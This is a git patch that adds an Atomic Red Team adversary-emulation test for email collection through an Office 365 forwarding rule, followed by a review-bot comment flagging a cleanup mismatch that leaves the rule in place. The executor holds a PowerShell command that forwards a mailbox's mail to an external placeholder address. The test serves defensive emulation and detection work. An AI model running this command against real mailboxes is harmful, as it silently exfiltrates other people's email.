From ef832dc7aaf2c0bf0d6c9421b3fc98d1fae312a3 Mon Sep 17 00:00:00 2001
From: Justin Schoenfeld
Date: Wed, 4 Jan 2023 16:25:29 -0500
Subject: [PATCH] Create T1114.003.yaml
---
atomics/T1114.003/T1114.003.yaml | 46 ++++++++++++++++++++++++++++++++
1 file changed, 46 insertions(+)
create mode 100644 atomics/T1114.003/T1114.003.yaml
diff --git a/atomics/T1114.003/T1114.003.yaml b/atomics/T1114.003/T1114.003.yaml
new file mode 100644
index 00000000..c9002d1a
--- /dev/null
+++ b/atomics/T1114.003/T1114.003.yaml
@@ -0,0 +1,46 @@
+attack_technique: T1114.003
+display_name: 'Email Collection: Email Forwarding Rule'
+atomic_tests:
+- name: Office365 - Email Forwarding
+ auto_generated_guid:
+ description: |
+ Creates a new Inbox Rule to forward emails to an external user via the "ForwardTo" property of the New-InboxRule Powershell cmdlet.
+ supported_platforms:
+ - office-365
+ input_arguments:
+ username:
+ description: office-365 username
+ type: String
+ default: null
+ password:
+ description: office-365 password
+ type: String
+ default: null
+ rule_name:
+ description: email rule name
+ type: String
+ default: "Atomic Red Team Email Rule"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ ExchangeOnlineManagement PowerShell module must be installed. Your user must also have an Exchange license.
+ prereq_command: |
+ $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
+ if (-not $RequiredModule) {exit 1}
+ if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
+ get_prereq_command: |
+ Install-Module -Name ExchangeOnlineManagement
+ Import-Module ExchangeOnlineManagement
+ executor:
+ command: |
+ $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+ $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+ Connect-ExchangeOnline -Credential $creds
+ New-InboxRule -Name "#{rule_name}-" -ForwardTo 'Atomic_Operator@example.com'
+ cleanup_command: |
+ $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+ $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+ Connect-ExchangeOnline -Credential $creds
+ Get-InboxRule | Where-Object { $_.Name -eq 'Atomic Red Team Email Rule' } | ForEach-Object { Remove-InboxRule -Identity $_.Identity -Force -Confirm:$False }
+ name: powershell
+ elevation_required: false
\ No newline at end of file
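Review bot: The cleanup_command never removes the rule the executor creates: `New-InboxRule -Name "#{rule_name}-"` appends a trailing hyphen (the rule is named `Atomic Red Team Email Rule-` with the default), while the cleanup filter `Where-Object { $_.Name -eq 'Atomic Red Team Email Rule' }` is an exact match on the hyphen-less default, so the external forwarding rule is left behind in the tenant after the test — a live exfiltration path rather than a simulated one. Change the executor line to `New-InboxRule -Name "#{rule_name}" -ForwardTo 'Atomic_Operator@example.com'` and the cleanup filter to `Where-Object { $_.Name -eq "#{rule_name}" }` so both follow the `rule_name` argument instead of one of them hard-coding the default. Neither command disconnects the session it opens; ending both with `Disconnect-ExchangeOnline -Confirm:$false` avoids leaving open remote PowerShell sessions behind. Because `#{password}` is interpolated into the command text, it can land in PowerShell history or transcripts on the host running the test; the description should say to use a dedicated test account whose password can be rotated afterwards.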